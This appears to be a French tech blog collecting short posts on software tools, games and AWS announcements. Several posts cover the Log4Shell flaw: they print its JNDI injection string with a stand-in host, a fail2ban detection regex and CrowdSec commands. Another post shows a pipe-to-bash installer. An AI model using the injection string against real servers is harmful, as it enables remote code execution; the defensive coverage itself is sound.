Mais ce compteur de dislikes est devenu au fil du temps un levier de harcèlement : l’afflux massif de pouces rouges coordonnés grâce à l’instinct grégaire des partisans du « Tous ensemble, on est encore plus cons » est venu bousculer la sensibilité des créateurs visés par cette foule harcelante, pour la simple raison qu’ils étaient eux-mêmes.

YouTube et les réseaux sociaux sont ainsi devenus d’affreux champs de bataille où ceux qui ne font rien harcèlent avec beaucoup de violence celui ou celle qui fait.

Alors il y a quelques mois, la plateforme YouTube a pris une importante décision : retirer le compteur de dislikes au grand damne des supporters de cet exutoire.

Snif les pauvres petits choux. Vous auriez vu les réactions, ils ont tous fait collectivement un genre de cyber-caca nerveux, c’était très drôle.

Maintenant sur Youtube, les internautes peuvent donc dire qu’ils n’aiment pas une vidéo, mais il n’y a plus de compteur leur permettant de savoir combien ils sont. Et c’est tant mieux, tant le harcèlement fait rage sur la plateforme.

Toutefois un développeur avec le cœur sur la main, a eu pitié de ces dislikeurs et a décidé de les soulager un peu du poids de leurs vies absurdes en leur proposant cette extension : Return Youtube Dislike.

Dispo sous Chrome, Firefox, Edge, Opera et Brave, cette extension fait de nouveau apparaître le pouce rouge sous les vidéos de tous ces créateurs YouTube que les gens aiment détester. L’extension collecte l’ID de la vidéo que vous regardez, et récupère le nombre de dislikes à l’aide de sa propre API. Si c’est la première fois que la vidéo a été récupérée par notre API, elle utilisera l’API de YouTube pour obtenir les données, puis les stockera dans la base de données, et vous les renverra en les affichant sur la page de la vidéo.

Et c’est ainsi que le pouce rouge fit son retour sur YouTube.

Si vous êtes sous macOS, vous connaissez forcément cette astuce pour retrouver votre curseur de souris sur l’écran. Il suffit de secouer votre souris et le curseur grossira immédiatement, vous permettant de le repérer rapidement. Fastoche.

Mais chez Microsoft, ils n’ont pas vraiment réussi à coder la même fonctionnalité. Ou alors c’est breveté chez Apple ?

Mais pas grave parce ce que Windows ne pas propose pas, les PowerToys l’ont. Pour rappel les Power Toys, c’est une suite d’utilitaires que Microsoft offre en téléchargement gratuit qui vous permettent de faire tout un tas de choses comme renommer des fichiers en série, sélectionner des couleurs, empêcher l’ordinateur d’entrer en veille…etc.

MAIS SURTOUT, il y a un outil qui s’appelle « Utilitaire de souris » avec une seule fonctionnalité : trouver ma souris.

Mdr…

Bref, une fois lancée, il vous suffira d’appuyer 2 fois sur la touche CTRL de gauche du clavier pour activer un halo de lumière divine autour de votre curseur.

C’est clairement une fonctionnalité indispensable à votre vie, j’en suis sûr :-))

À télécharger ici !

Si vous êtes encore en train de lutter avec la faille log4j, il y a des tas de techniques pour parer l’attaque comme vous pouvez le lire ici ou grâce à Crowdsec. Mais même si vous avez tout patché et que vous ne risquez plus rien, il y a probablement des tas de rigolos qui tentent quand même leur chance. Et ça pourrit vos logs.

La meilleure solution serait donc de bannir toutes les IPs qui tentent d’exploiter cette vulnérabilité.

Jay Caines-Gooby a mis en ligne sur son site une règle fail2ban qui détecte et bannit immédiatement les IPs des affreux qui jouent avec log4j.

Pour cela, ajoutez la règle suivante dans /etc/fail2ban/jail.local

[log4j-jndi]
maxretry = 1
enabled = true
port = 80,443
logpath = /path/to/your/*access.log

Puis créez le fichier

/etc/fail2ban/filter.d/log4j-jndi.conf

et mettez y la définition regex suivante :

[Definition]
failregex   = (?i)^<HOST> .* ".*\$.*(7B|\{).*(lower:)?.*j.*n.*d.*i.*:.*".*?$

Et voilà !

Merci à Henri pour l’info et si vous voulez suivre les discussions sur cette règle Fail2Ban, le gist du code est ici.

Si vous êtes du genre à pomper des images sur Internet pour les modifier, les annoter, les repartager…etc., je vous présenter BetterViewer, une formidable extension pour Chrome / Edge open source qui propose tout un tas d’outils dès que vous ouvrez une image sur votre navigateur.

BetterViewer a été imaginé pour remplacer le mode aperçu d’image des navigateurs sur Chrome et permet par exemple de recouper une image, de dessiner dessus, de flouter certaines parties, de la zoomer, de l’afficher en plein écran, mais également de la télécharger ou l’uploader sur Imgur.

Et cerise sur le bonus, il y a même un mode de reconnaissance de caractères pour récupérer du texte présent sur l’image.

Et il y a même des raccourcis clavier pour les plus pressés.

Bref, une super extension qui vous rendra bien des services.

Si vous aimez faire du Pixel Art, je vous ai déjà présenté tout un tas d’éditeurs de pixels très très cools. Je pense bien sûr à Pixelorama, LibreSprite ou encore Piskel.

Mais aujourd’hui, je vous propose d’aller encore plus loin en faisant du pixel art avec des CSS. Alors bien sûr, vous pouvez le coder vous-même en spécifiant la couleur de chaque pixel, voire même en l’animant comme sur l’exemple codepen ci dessous.

See the Pen #divtober Bright Pumpkin by Ale (@pokecoder) on CodePen.

Mais comme on est des grosses feignasses développeurs, je vous propose carrément de dessiner votre pixel art pour ensuite obtenir le code qui va bien. Pour cela, rendez vous sur Pixel Art to CSS pour dessiner votre œuvre. Vous pouvez choisir les couleurs, les pinceaux, revenir en arrière si besoin…etc. Rien du classique.

Mais ce qui est vraiment cool, c’est que vous pouvez aussi créer des animations avec plusieurs sprites. Ce qui donne un rendu très cool comme ceci :

Et oui, ce petit papa Noël a 2 particularités uniques : Il est totalement en CSS et c’est moi qui l’ai dessiné !

Le projet Pixel Art to CSS est développé à l’aide de React et vous pouvez retrouver le code source ici.

— Article rédigé par l’ami Remouk (DTC) – Merci à lui —

Il est toujours bon de solliciter nos cellules grises, faire travailler le ciboulot et lui éviter de se ramollir, mais sans non plus se prendre la tête. Certains s’adonnent au sudoku, mots croisés, ou aux jeux vidéo type Picross, par exemple. Ce que je préfère, ce sont les petites séries d’exercices réguliers et variés (par exemple sur BrainExer), rien de compliqué mais de quoi faire tourner la machine de manière détendue.

Je ne sais pas si vous vous souvenez, c’est en 2005 que le « Programme d’entraînement cérébral du Dr Kawashima » avait popularisé ce genre d’exercice sur la DS, la console portable à deux écrans de chez Nintendo. Depuis, d’autres versions sont sorties et le dernier en date est un « spin off » nommé Cérébrale Académie : Bataille de méninges, sur Switch.

Dommage de ne pas l’avoir nommé « Scènes de méninges »… 😁

L’originalité principale du jeu tient dans le nom, avec cette notion de bataille : on peut y jouer à plusieurs et comparer la taille de nos b… bulbes. 🙂 Chacun choisi son niveau et y a même une option pour les enfants, afin que tout le monde puisse s’affronter dans la joie et la bonne humeur, c’est accessible à tous. Il est possible de partager l’écran tactile quand on joue à deux, mais sinon c’est chacun sa manette et même si je préfère faire des traces de doigts sur l’écran, faut admettre que ça fonctionne vraiment bien.

Toujours dans cette idée de compète, à condition d’avoir un abonnement Nintendo Online, on peut défier les performances de nos amis (et pas que) grâce un système de fantômes, c’est super sympa.

Mais au quotidien, c’est plutôt tout seul que l’on va jouer : en s’entraînant sur les 20 épreuves proposées (la difficulté s’adapte automatiquement), puis en faisant un examen. On en ressort avec une note, et ça permet de mieux apprécier sa progression.

Il y a des médailles à gagner pour débloquer un autre mode de difficulté, des éléments cosmétiques mignons à collectionner, mais c’est à peu près tout. On aurait aimé plus d’épreuves et un meilleur suivi de notre progression (par exemple des statistiques quotidiennes sur nos scores, etc.), cependant, le jeu est vendu moins cher que la normale, donc c’est OK. Rien de scandaleux. 🙂

À noter qu’il y a une version démo sur l’eShop, je vous conseille de la tester pour voir si ça vous plaît avant de passer à la caisse !

Acheter Cérébrale Académie : Scène de méninges (😉) sur Switch

Si vous cherchez un utilitaire en ligne de commande simple à utiliser qui permette de transférer des fichiers et des répertoires entre 2 ordinateurs, voici un projet très cool soutenu par DigitalOcean.

Ce projet s’appelle Croc et permet d’envoyer ou recevoir des fichiers au travers d’Internet (via un serveur relais) directement depuis la ligne de commande (donc scriptable) et cela aussi bien depuis un Mac qu’un Linux ou un Windows.

Avec Croc, les transmissions sont chiffrées de bout en bout à l’aide de la méthode PAKE et vous pouvez transférer plusieurs fichiers en même temps. Si par malheur un transfert est interrompu, Croc saura automatiquement le résumer.

Et si vous voulez vraiment améliorer les choses, vous pouvez même spécifier un proxy (Tor est supporté).

Pour installer Croc vous pouvez utiliser curl comme ceci :

curl https://getcroc.schollz.com | bash

Si vous êtes sous mac, bah comme d’habitude brew comme ceci :

brew install croc

Et sous Windows, vous pouvez télécharger le binaire ici ou utiliser Scoop ou Chocolatey :

scoop install croc
ou
choco install croc

Ensuite pour envoyer un fichier, il suffit de taper la commande croc suivie du nom du fichier à envoyer :

croc send FICHIER_OU_DOSSIER

Vous obtiendrez alors un code que vous devrez transmettre à votre destinataire. Celui-ci n’aura qu’à entrer la commande croc suivie du code pour que la connexion s’établisse et que le fichier se transmette.

croc CODE

Et pour passer par Tor :

croc --socks5 "127.0.0.1:9050" send FICHIER.ZIP

Top non ?

Le reste de la documentation se trouve ici ! Amusez-vous bien !

Il y a quelques jours, j’avais besoin de trouver une version nigthly d’un projet open source et pas de bol, rien n’était proposé à portée de clic sur la page Github. Pour trouver une version nightly, il faut aller fouiller dans les « Actions » de Github et récupérer l’artefact produit dans le workflow qui nous intéresse.

Pas pratique, surtout pour les débutants. Alors si vous voulez proposer un lien direct vers une version nightly générée via Github Actions et qui par définition change très rapidement, il suffit de passer par le site nightly.link.

En entrant le lien pointant vers le fichier build-app.yml ou en associant votre compte Github, vous obtiendrez des liens vers la dernière build de votre projet que vous pourrez ensuite proposer aux gens qui apprécient celui-ci.

Un peu spécifique comme besoin, mais très cool non ?

— En partenariat avec Crowdsec —

Si vous travaillez dans le domaine de la cybersécurité, vous avez probablement passé un très mauvais week-end.

Et ce, à cause de la découverte de la vulnérabilité zero-day Log4j (CVE-2021-44228).

L’équipe CrowdSec s’est retroussé les manches pour développer un scénario capable de détecter et bloquer les tentatives d’exploitation de cette vulnérabilité. Vous pouvez le télécharger directement depuis le Hub de CrowdSec et l’installer en un clin d’œil. 

L’efficacité de CrowdSec se basant sur le pouvoir de la foule, et à la lumière de la taille de leur communauté en pleine expansion, la solution a déjà collecté un grand nombre d’adresses IP qui tentant d’exploiter la vulnérabilité. Vous pouvez consulter la liste ici. Elle est très fréquemment mise à jour et il va sans dire que vous devriez bloquer sans attendre celles qui sont marquées comme « validated ».

Ces adresses IP ont été sélectionnées par l’algorithme de consensus de la solution, ce qui signifie qu’elles ont reçu de nombreux votes défavorables de la part de leur réseau d’utilisateurs. Celles qui sont marquées comme “not enough data” sont très suspectes mais peuvent encore contenir quelques faux positifs. Les adresses classées dans la catégorie « benign » sont utilisées par des personnes qui sont généralement du bon côté de la force, pour aider, scanner, et non à des desseins malfaisants. 

Vous pouvez également utiliser leur mode replay, ou forensics, pour analyser les logs de vos serveurs afin de vérifier si une exploitation Log4j a été tentée sur l’une de ces IP, par qui et quand, en utilisant le scénario approprié et la ligne de commande ci-dessous :

sudo cscli hub update
sudo cscli scenarios install crowdsecurity/apache_log4j2_cve-2021-44228
sudo systemctl reload crowdsec

# sudo crowdsec --dsn "file://<log_file_path>" -no-api --type <log_type>
sudo crowdsec --dsn "file:///var/log/nginx/access.log" -no-api --type nginx

sudo cscli alerts list --scenario crowdsecurity/apache_log4j2_cve-2021-44228

Si vous souhaitez accéder à plus de détails concernant cet IPS open source et collaboratif, qui est capable de détecter et bloquer de nombreux comportements malveillants, tout en vous permettant de collaborer entre cyber défenseurs en échangeant les IPs bloquées, visitez leur site web ou leur dépôt GitHub. 

Courageux résistants qui utilisent encore Firefox, voici un super outil pour le personnaliser à fond !

Ça s’appelle Firefox Color et une fois l’extension installée, il vous suffit de jouer avec les paramètres de couleurs pour créer le thème Firefox qui vous correspond. Couleur de la barre d’onglets, couleur de fond, couleur du champs de recherche, couleur des tooltips…etc. Tout est modifiable !

Vous pouvez même uploader une image pour l’avoir en fond dans la barre d’onglets. Par exemple, j’ai fait un petit thème spécial Noël :

Firefox Color est très sympa puisqu’il vous permet de vous faire un petit Firefox custom mais également d’exporter vos œuvres pour les proposer à votre communauté, famille, amis…etc.

N’hésitez pas à partager vos thèmes ici aussi ! Et si vous n’avez pas d’inspiration, il y a un gros bouton RANDOM en haut qui permet d’avoir des résultats souvent moches mais parfois agréablement surprenant.

Est-ce que vous vous souvenez de 3D Pinball sous Windows ? Créé en 1995, ce jeu était disponible d’origine d’abord dans Windows 95 Plus! jusqu’à Windows XP. Il s’agissait en réalité d’une version de Full Tilt! Pinball édité par Maxis (Sim City) avec la table Space Cadet.

Ensuite, avec l’arrivée de Windows Vista, ce jeu a été abandonné à cause d’un bug au niveau de la détection des collisions dans la version 64 bits. Mais la bonne nouvelle c’est que vous allez pouvoir y rejouer grâce à ce portage de k4zmu2a qui a totalement reversé 3D Pinball : Space Cadet à l’aide de Ida et Ghidra.

À partir de là, il est possible de télécharger ou compiler une version pour Windows, Linux et macOS.

D’autres portages sont également disponibles pour la Nintendo Switch, Android, PS Vita, 3DS, Wii et Wii U.

Et si vous avez la flemme de le compiler, vous pouvez même jouer à une version en ligne ici.

Si vous vous intéressez un peu à la sécurité informatique, il ne vous aura pas échappé que le 9 décembre dernier, une faille 0day touchant Apache Log4j avait été divulguée. Baptisée Log4Shell, cette faille qui touche log4j de la version 2.0 à 2.14.1 a obtenu un score CVSS de 10/10 en matière de gravité.

Woohoo.

Ça transpire fort un peu partout surtout que la faille est actuellement utilisée. Pour vous la faire courte, il suffit de réussir à faire passer dans les logs analysés par log4j les caractères suivants.

${jndi:ldap://URL.com/FICHIER_JAVA}

et cela aura pour effet de télécharger et exécuter le fichier java qui est au bout de l’url « URL.com/FICHIER_JAVA ». C’est aussi simple que dramatique.

Il y a beaucoup de littérature là-dessus notamment du côté du CERT-FR donc je ne vais pas m’étaler sur le sujet, mais un projet Github intéressant et amusant est né de tout ce bordel.

Vous le savez, pour patcher cette vulnérabilité Log4Shell (CVE-2021-44228), il faut de toute urgence mettre à jour log4j vers une version >= 2.15.0.

Et si ce n’est pas possible :

Pour les applications utilisant les versions 2.10.0 et ultérieures de la bibliothèque log4j, il est également possible de se prémunir contre toute attaque en modifiant le paramètre de configuration log4j2.formatMsgNoLookups à la valeur true, par exemple lors du lancement de la machine virtuelle Java avec l’option -Dlog4j2.formatMsgNoLookups=true. Une autre alternative consiste à supprimer la classe JndiLookup dans le paramètre classpath pour éliminer le vecteur principal d’attaque (les chercheurs n’excluent pas l’existence d’un autre vecteur d’attaque).

Cert FR

Mais une autre possibilité consiste à laisser faire la nature et c’est ce que propose Cybereason avec ce code baptisé Logout4Shell qui exploite la vulnérabilité Log4Shell pour… la patcher tout simplement.

Le payload qui est chargé via la faille va forcer l’enregistreur Log4j à se reconfigurer pour basculer le paramètre qui va bien sur True et empêchera ainsi toute exploitation ultérieure via cette attaque.

C’est un genre de cyber vaccin en attendant une vraie mise à jour de Log4j.

Si cela vous intéresse, le code est dispo sur Github.

Bon courage à ceux qui sont impactés.

A lire également :

• https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
• https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
• https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217
• https://github.com/christophetd/log4shell-vulnerable-app
• https://www.lunasec.io/docs/blog/log4j-zero-day/
• https://www.vmware.com/security/advisories/VMSA-2021-0028.html

— En partenariat avec Yousign —

Un gain de temps phénoménal

Avec la généralisation du télétravail, mais également des rendez-vous en visioconférence, les entreprises ont dû se mettre à la signature électronique massivement.

En effet, grâce à la signature électronique, on évite d’imprimer d’épais documents sur papier, de les scanner pour les envoyer par email ou par la Poste. Et ainsi tout peut se faire à distance, de manière totalement transparente et sécurisée. C’est un gain de temps phénoménal !

Concrètement, il n’y a que des avantages avec la signature électronique. Que ce soit pour approuver un devis ou signer les documents d’une assemblée générale, tout se fait en douceur et rapidement. Pour l’utiliser régulièrement, je peux vous dire que c’est vraiment plus confortable de parapher et signer des centaines de pages d’un seul clic plutôt qu’avec un bon vieux stylo et il est beaucoup plus simple de recueillir les signatures de tout le monde sur plusieurs documents en même temps, surtout si tout le monde est éparpillé aux quatre coins de la France.

Pour les clients à qui vous faites signer des devis par exemple, c’est également un super confort, car ils peuvent signer le document depuis n’importe où et à partir de n’importe quel ordinateur, tablette ou smartphone. Cela vous permet de conclure des contrats plus rapidement et donc d’augmenter votre efficacité commerciale.

Une sécurité renforcée

Et comme tout est dématérialisé, les documents sont envoyés automatiquement à toutes les parties et peuvent être conservés en lieu sûr ou intégrés dans vos processus techniques et chacun est informé lorsque toutes les signatures ont été collectées. L’absence de papier dans le processus permet également d’économiser des coûts d’impression, d’envoi, de déplacement…etc et donc de réduire un petit peu votre empreinte écologique. Plus de papier, plus de transport et moins de temps perdu !

Côté sécurité, la signature électronique garantit à la fois l’authenticité de la signature et l’intégrité du document grâce à du chiffrement et à des processus d’identification des signataires. Ainsi, il devient impossible de falsifier une signature électronique ou de modifier un document déjà signé. C’est un énorme avantage !

Sans parler du fait qu’un document papier peut-être volé ou perdu. Avec des documents sécurisés dans le cadre d’une signature électronique, ce risque devient presque nul.

Yousign – La référence en Europe

Si pour vous, la sécurité et la légalité de la signature électronique sont des facteurs importants, je vous invite à tester Yousign. Ainsi vous saurez comment faire une signature électronique très simplement, en profitant de leur offre d’essai de 14 jours.

Yousign est une solution de signature électronique française qui respecte le cadre juridique européen et qui est vraiment bien pensée. Tout le processus de création de documents, d’envoi et de signature est optimisé pour vous prendre le moins de temps possible.

En quelques clics, vos documents sont mis en ligne, et les signataires sont prévenus. Les relances pour les têtes en l’air sont automatiques et vous pouvez suivre en temps réel les invitations à signer.

Évidemment, Yousign a fait de la sécurité sa priorité numéro 1 et répondra à tous vos besoins de confidentialité et de traçabilité. La solution est d’ailleurs certifiée eIDAS (Electronic IDentification Authentication and trust Services), un règlement de l’UE sur l’identification électronique et les services de confiance pour les transactions électroniques au sein de l’Union Européenne). Elle intègre évidemment de l’authentification forte (OTP), du stockage chiffré et sécurisé et toutes les preuves sont horodatées et archivées sur la plateforme.

Ainsi, tous les signatures et documents signés via Yousign seront 100% légaux et sécurisés.

À découvrir ici.

Les vacances de Noël approchent et si vous avez des enfants créatifs qui aiment les coloriages ou si vous-même pratiquez du coloriage pour adultes, histoire de vous détendre pendant les confs Zoom, j’ai ce qu’il vous faut.

Disney a mis en ligne sur son store un vingtaine de cahiers d’activité en PDF avec tous vos héros préférés. Des coloriages y compris pour adultes, des jeux, des tutos dessins…etc. de la Reine de Neige, de Marvel, Starwars, Nemo, Mickey et j’en passe.

Vous retrouverez tous ces PDF en téléchargement sur cette page.

Notez qu’il y a également d’autres sections sur le site avec des jeux, des quizz, des cahiers pour apprendre à dessiner les personnages de Disney, et des activités manuelles

Passez de bonnes fêtes de Noël (oui, je suis un peu en avance…). Pour ma part, je vais prendre 14 jours pour savoir dessiner Nemo et Spiderman correctement !

Imaginez… Vous avez pris une photo que vous aimez beaucoup. Malheureusement, quelque chose ou quelqu’un est venu la « photo-bomber », c’est-à-dire s’incruster dessus pour gâcher à l’aide de son physique disgracieux l’arrière-plan que vous affectionniez beaucoup.

Comment faire quand on n’est pas un pro de la retouche photo ?

Et bien c’est simple, il suffit d’aller sur Cleanup.pictures, d’uploader votre photo et de gribouiller le machin que vous voulez retirer.

Et le résultat est magique ! En voici la preuve !

Bluffant n’est-ce pas ?

Pour fonctionner, l’outil utilise le code du projet LaMa qui utilise un réseau neuronal pour reconstruire l’image en utilisant des convolutions de Fourier de manière super rapide.

De quoi mettre au chômage des générations de retoucheurs photos et briller en société notamment auprès de sa tata.

Amusez-vous bien !

— Article rédigé par l’ami Remouk (DansTonChat) – Merci à lui —

La saga Pokémon compte un grand nombre de suites ou de spin-offs, et pourtant ça n’empêche pas l’usine à Pikachu de nous pondre régulièrement des remakes, histoire de faire du neuf avec du vieux… C’est le cas de Pokémon Perle Scintillante et Diamant Étincelant sur Switch, mais alors est-ce que ça mérite une petite place sous le sapin ?

Qui dit remake dit gameplay à l’ancienne : sous un nouveau moteur graphique tout beau tout frais (le jeu est mignon comme tout), se cache les mêmes rouages que les versions originales de Perle et Diamant. Ce n’est pas une mauvaise chose car ils étaient chouettes, et honnêtement ça m’a fait plaisir de retrouver une aventure traditionnelle, en vue de dessus comme à l’époque. On retombe en enfance. 👶

Alors c’est parti : on se balade de ville en ville dans la région de Sinnoh, on croise d’autres dresseurs, on les combats au tour par tour, on capture de nouvelles créatures, on les entraîne, elles évoluent, on affine son équipe pour espérer battre les champions d’arènes… De la stratégie, de la découverte, y a pas à dire, la formule de ce RPG est toujours aussi agréable !

Au niveau des changements, le partage d’XP est rendu obligatoire, ce qui arrange 90% des joueurs mais fera rager les puristes (à raison, car cela aurait pu être optionnel). Pour le reste, au-delà du visuel amélioré, quelques aspects secondaires sont intelligemment étoffés (les capacité secrètes, les sous-terrains, les concours, les fonctionnalités en ligne…), on apprécie les améliorations même si globalement nous sommes en terrain connu.

Histoire de pinailler, parce qu’on adore ça : les petits défauts habituels de ce genre de jeux (textes impossibles à passer, actions répétitives dans les menus, etc.) sont malheureusement toujours présents, et les déplacements sont un peu rigides. Pas de quoi gâcher le fun, mais on aurait apprécié une ergonomie plus fluide, plus moderne, pour ces épisodes sortis il y a 15 ans.

Si la progression semble assez facile (grâce au multi XP ou aux aides mémoires sur l’efficacité des attaques, par exemple), le contenu reste conséquent et offre une excellente durée de vie. Remplir le Pokédex va vous prendre un bon paquet d’heures. 🙂 Pour cela, je pense que c’est une très bonne porte d’entrée pour découvrir la licence ou se faire un kiff rétro-nostalgique !

Bref c’est pas loin d’être le parfait petit Pokémon à l’ancienne, mais quelques anachronismes gâchent (très) légèrement la méga-teuf. Il n’empêche que si vous cherchez une aventure plus classique aux derniers jeux Pokémon (Épée et Bouclier), c’est une bonne alternative, une valeur sûre.

Offrir Pokémon Perle Scintillante ou Pokémon Diamant Étincelant

Le pack avec les deux versions

Dernière nouveauté qui a attiré mon attention lors de la conf ReInvent 2021 d’AWS, l’arrivée d’un éditeur de chatbot. Les chatbots qu’on appelle en français « agent conversationnel » (argh) sont très à la mode en ce moment, car ils permettent par exemple de réserver une chambre d’hôtel ou de commander des fleurs en écrivant simplement dans une fenêtre de chat.

C’est une interface qu’on trouve en général sur un site web, mais c’est surtout pour moi l’étape précédent l’interaction totalement vocale (avec Alexa par exemple).

AWS propose donc maintenant un concepteur de chatbot au sein de son service Amazon Lex. Pour rappel, Amazon Lex est un service qui permet de créer des interfaces conversationnelles en utilisant la voix et le texte. Grâce à Lex, la moteur d’apprentissage (deep learning) d’Alexa est rendu accessible à tous les développeurs qui souhaitent intégrer des chatbots sophistiqués en langage naturel à leurs applications.

Comme tout le monde n’a pas forcément le temps de coder tout ça, Amazon a sorti un concepteur automatisé de chatbot qui permet d’aller facilement jusqu’à la phase de conception avec Amazon Lex.

Ce concepteur de chatbots utilise le machine learning pour analyser ce qui lui est demandé et proposer une expérience de base, qui peut ensuite être enrichie et affinée pour répondre encore mieux aux demandes des utilisateurs. C’est donc un bon moyen de concevoir des chatbots en quelques heures sans passer par la case développement qui peut prendre plusieurs semaines.

Vous pouvez évidemment tester tout ça en vous rendant ici. C’est gratuit durant la preview et après ce sera facturé (voir les prix sur la page Amazon Lex)

Et pour apprendre à l’utiliser, c’est par ici que ça se passe.

Youtube-dl, je suis sûr que vous adorez, mais si la ligne de commande vous rebute, voici FireDM, un super outil de téléchargement qui permet de récupérer n’importe quel fichier ou vidéo YouTube ou autre le plus rapidement possible.

Développé en Python, FireDM utilise un système de connexions simultanées pour récupérer des fichiers seuls ou des playlists entières de tout un tas de sites de streaming. Chaque download peut être repris là où il s’est arrêté en cas de coupure réseau et vous pouvez même commencer à regarder une vidéo avant même qu’elle soit finie d’être téléchargée.

Une fonctionnalité « batch » permet de récupérer plusieurs liens en même temps et pour les vidéos, programmer des horaires de téléchargement et vous pouvez même récupérer les sous-titres séparément ou choisir la qualité de la vidéo avant de la télécharger.

FireDM surveille votre presse papier, donc vous n’aurez qu’à copier un lien pour que celui-ci soit automatiquement détecté par FireDM.

Pour ceux qui aiment récupérer des vidéos « protégées » dans un espace « membre », FireDM supporte également les cookies ou les logins / password.

C’est un super outil qui je pense vous rendra bien service. C’est dispo ici pour Linux et Windows.

Dans cette vidéo, je vous explique les bases pour bien utiliser Brew, un gestionnaire de paquets indispensable pour macOS qui vous permettra de vous sentir sous Mac comme sous Linux.

Brew, le meilleur gestionnaire de paquet de macOS (non officiel) vous permettra d’installer facilement des applications et vous facilitera la vie sous mac, un peu comme si vous étiez sous un bon vieux Linux.

Notez que Brew existe également sous Linux donc si vous êtes linuxien, ça peut également vous intéresser.

Bonne semaine à tous et encore merci pour votre soutien ! Et pensez à vous abonner à ma chaine Youtube !

https://brew.sh/

Si vous avez un casque audio ou des écouteurs Bluetooth, cet article va sûrement vous intéresser. En effet, la plupart des casques audio du marché modifient la courbe de réponse fréquentielle pour ajouter plus de basses ou plus d’aigu au son d’origine. Peu de casques sont réellement neutres en termes de son, ce qui chagrine beaucoup les audiophiles.

Heureusement, grâce au projet AutoEq, ce sont plus de 2500 casques audio qui ont été analysés afin de fournir les bons réglages d’égalisation afin de retrouver un son neutre avec votre casque.

Ainsi, ce projet AutoEq se compose d’une collection de paramètres d’égalisation, mais également d’outils pour égaliser vous-même votre casque sous Windows, macOS, Linux, iOS et Android.

Pour connaître ces paramètres, rendez-vous sur cette page et cherchez le nom de votre casque audio.

Par exemple pour mon Bose, voici les EQ (paramétrique et fixes) :

Ensuite, il ne vous reste plus qu’à saisir ces informations dans des outils comme EqualizerAPO, Peace (Windows), Wavelet (Android), PulseEffect (Linux)…etc.

En jouant avec « l’égaliseur », vous atteindrez un son le plus neutre possible.

Bonne écoute à tous !

Durant la conf ReInvent 2021 d’AWS, j’ai assisté à l’annonce de Amplify Studio, un environnement de développement très visuel, no-code qui permet aux développeurs de créer des interfaces frontend.

Pour rappel, Amplify est une suite d’outils et de services qui permettent aux dev web et mobile de créer de toutes pièces des applications full stack qui sont hébergées sur AWS. On y trouve des modules pour gérer l’authentification, le stockage, la base de données, l’analyse des stats, l’intégration d’API mais également tous les outils back pour son déploiement (CI/CD, domaines personnalisés, hébergement…etc.).

Pour apporter encore plus de souplesse aux développeurs, AWS propose Amplify Studio qui est donc capable de « convertir » des designs Figma en interface que vous pouvez ensuite mapper avec votre modèle de données pour créer vos applications. L’intégration avec Figma est bien pensée et permet de récupérer du code permet de générer du code React réutilisable en important votre fichier de conception Figma.

Amplify Studio convertit ainsi automatiquement tout composant Figma en un composant React qui peut ensuite être utilisé dans l’application. Chaque fois que vous faites une modification dans Figma, vous synchronisez ensuite les changements avec Amplify Studio et l’application se met à jour.

Les applications créées sur Amplify sont ainsi évolutives (scalables) et vous ne payerez que ce que vous consommez niveau hébergement. C’est un bon moyen de faire des MVP (Minimum valuable product), des sites vitrine, des blogs, des applications mobiles, des petites bases de données… totalement dans le cloud d’Amazon.

Vous l’aurez compris, avec Amplify Studio, vous pourrez créer rapidement une application Web complète, front et back, avec un codage minimal, tout en conservant un contrôle total sur la conception et le comportement de votre application via l’accès au code.

Le tout ensuite, est déployable sur les serveurs d’Amazon en un clic.

Pour tester Amplify Studio et apprendre à créer votre premier site ou application mobile de cette façon, je vous invite à suivre ce tutoriel.

Si vous utilisez un VPN de qualité comme Cyberghost, vous avez maintenant accès à tous les catalogues Netflix du monde et surtout le catalogue US qui offre un choix de films et de série beaucoup plus large que ce que nous avons en France.

Mais avec tous ces catalogues à votre portée, il n’est pas simple de s’y retrouver concernant les nouveautés. Mais c’était sans compter sur le site Unogs qui offre un aperçu des dernières nouveautés Netflix pays par pays.

Super pratique si vous avez l’impression d’avoir écumé le catalogue et que vous ne savez plus quoi regarder.

D’une manière générale, je trouve que les nouveautés Netflix, mis à part leurs blockbusters, sont mal mises en avant sur l’application, donc ce site est une aubaine pour les amateurs de séries et de cinéma.

Alors qu’est ce qu’on se regarde ce soir ?

Vous le savez si vous me suivez sur les réseaux, cette semaine, j’ai eu le plaisir de me rendre à Las Vegas pour assister à la grande messe d’AWS (Amazon).

Beaucoup de nouveautés dans une offre déjà foisonnante alors j’ai décidé de faire un focus sur ce qui m’intéressait le plus. Ainsi, parmi les annonces de ces quelques jours, celle concernant CodeGuru a retenu mon attention. D’autres articles feront suite à celui-ci.

Mais avant de vous en parler, j’aimerais vous expliquer ce qu’est CodeGuru si vous ne connaissez pas. Il s’agit d’un outil pour les développeurs qui utilise du machine learning pour proposer des axes d’amélioration sur votre code en Python ou Java.

Ainsi CodeGuru (Profiler) est ainsi capable d’identifier les lignes de code qui alourdissent le programme et de proposer des recommandations, dans un seul et unique but : améliorer la qualité de ce dernier et donc les performances de vos applications.

Grâce à son apprentissage machine en continu, CodeGuru (Reviewer) est également capable d’identifier des failles de sécurité, des fuites de ressources, des entrées incorrectes, des bugs critiques ou encore un éloignement des bonnes pratiques de sécurité d’AWS. Toutes ces choses qui en règle générale sont complexes à trouver en phase de développement.

C’est d’ailleurs sur cette partie Reviewer que CodeGuru s’illustre une nouvelle fois. Vous le savez, car j’en parle souvent, il y a régulièrement des fuites de données sur des projets à cause d’une mauvaise gestion des secrets tels que les mots de passe, les clés API, les informations d’identification, clés SSH…etc.

Il n’est pas que les développeurs code en dur dans des variables certaines de ces valeurs et lorsque le fichier qui contient ces valeurs se retrouve sur un dépôt, accessible à tous, ça devient vite une catastrophe en termes de sécurité.

Pour remédier à cela, AWS a mis au point un « détecteur de secrets » au sein de CodeGuru Reviewer. Cet outil respecte la même philosophie, à savoir accompagner les développeurs dans l’amélioration de leur code. Cette nouvelle fonctionnalité utilise du machine learning comme le reste, pour identifier les secrets inscrits en dur dans votre code et vous alerte lorsque que des « secrets » sont détectés dans le code source, la documentation ou les fichiers de config.

Lorsqu’un secret est découvert, CodeGuru Reviewer suggère une correction pour le protéger à l’aide d’AWS Secret Manager, son gestionnaire sécurisé de mots de passe.

Cette nouveauté est sans surcoût et prend en charge un tas de fournisseurs d’API comme AWS, Atlassian, Datadog, Databricks, GitHub, Hubspot, Mailchimp, Salesforce, SendGrid, Shopify, Slack, Stripe, Tableau, Telegram et Twilio.

